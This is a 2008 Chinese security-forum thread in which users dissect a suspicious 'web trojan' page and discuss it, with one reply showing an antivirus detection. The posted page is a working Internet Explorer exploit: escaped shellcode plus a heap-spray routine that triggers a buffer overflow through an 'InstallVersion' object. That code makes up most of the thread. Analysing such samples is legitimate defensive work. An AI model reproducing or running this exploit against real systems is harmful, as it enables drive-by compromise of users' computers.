来个高手把这段解了

显示全部楼层 · 发表于 2008-2-11 12:39:13

常规方法解出来是乱码

<HTML><HEAD><SCRIPT language="javascript">
var Shellcode=unescape("%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u0100%ufe8b%u2e80%u8007%u0436%ue246%uebf7%ue805%uffe9%uffff%ub5f4%u0b0b%u620b%uac67%u0b3b%u0b0b%u4b96%u960f%u1f7b%u96b0%u1373%ufa96%u0775%uf364%u0b55%u0b0b%u04ed%u7273%u0b71%u730b%u7d78%u706f%u0257%u9619%uf3f3%u0b37%u0b0b%uef8e%u962b%u75df%u5e2b%u5902%uca07%u2307%u6e5f%u787b%u47ca%u0723%u6831%u6883%u47c9%u1323%u3e0b%u5bcb%u5e5b%u5b5a%u5902%u961b%u75df%u5e08%u5902%u0213%u0f59%u595c%u7896%u963f%u3877%u0e83%u59f8%u7996%u0e2b%u3ef8%u54d4%ub04c%uc80e%ue63e%uc112%u431b%u77fd%ucc13%u10d6%ue50e%uf64b%u46fc%u7822%u61ea%u6196%u0e27%u69e0%u0f96%u9656%u1f61%ue00e%u0796%u0e96%ub6c8%u6461%uf3ce%u025c%u0202%u5191%uef11%ue6f0%u03ef%u01a3%u1195%ue381%u7eed%u2539%u7b32%u7773%u7b77%u3245%u7a32%u7a7a%u8431%u7872%u707d%u6768%u687e%u7d6c%u736e%u7431%u6971%u3272%u7e7b%u3276%u7872%u3177%u737b%u427b%u406d%u6970%u6c7e%u3b3d%u383b%u3830%u0b3b");
function Run_BOF() {
var spraySlide1 = unescape("%u002C%u11C0");
var spraySlide2 = unescape("%u002C%u1200");
var spraySlide3 = unescape("%u9090%u9090");
var heapSprayToAddress=0x12000000;
var heapBlockSize=0x400000;
var ShellcodeSize=Shellcode.length * 2;
var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
MemoryBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<MemoryBlocks;i++)
{ memory=(i%3==0) ? spraySlide1 + Shellcode:
(i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; }
location.href="javascript:void (new InstallVersion());";
var eaxAddress = 0x1180002C;
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{ spraySlide+=spraySlide; }
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</SCRIPT></HEAD>
<BODY ></BODY></HTML>

显示全部楼层 · 发表于 2008-2-11 13:09:13

呼叫吉米大人

显示全部楼层 · 发表于 2008-2-11 14:50:23

阿米持续失踪，这国外网马就是挂的有创意啊

算法都一套一套的，看来写解密软件这个东西真是任重道远啊

显示全部楼层 · 发表于 2008-2-11 15:38:59

不是下载者脚本，没什么好解的
直接spray memory heap来执行bo攻击

显示全部楼层 · 发表于 2008-2-11 15:45:10

..正解。全模拟执行。纯粹攻击性行为

显示全部楼层 · 发表于 2008-2-11 15:47:01

做个txt让antivir砍砍
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\asd.txt'
C:\Documents and Settings\Administrator\My Documents\
  asd.txt
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Shellcode.Gen
   [WARNING] The file was ignored!

显示全部楼层 · 发表于 2008-2-11 15:49:33

这么一说还真有点，我调试代码的时候就有点卡机器，这个也太阴险了吧，同样的一段代码里，前面用ms0464漏洞可是下载了个下载者

显示全部楼层 · 发表于 2008-2-11 15:53:01

在IE里js其实有很大的权限，不止可以用来下载木马而已
要直接把你的系统崩掉也不成问题

显示全部楼层 · 发表于 2008-2-11 15:56:02

惯性思维，看来外国佬挂马不实际啊，破坏人家系统有啥好的，不如盗号划算啊

显示全部楼层 · 发表于 2008-2-11 15:59:20

当然也还能做到很多其他的东西

[可疑文件] 来个高手把这段解了

回复 4楼 solcroft 的帖子

回复 7楼 zzh161 的帖子

回复 8楼 solcroft 的帖子

回复 9楼 zzh161 的帖子

本帖子中包含更多资源

浏览过的版块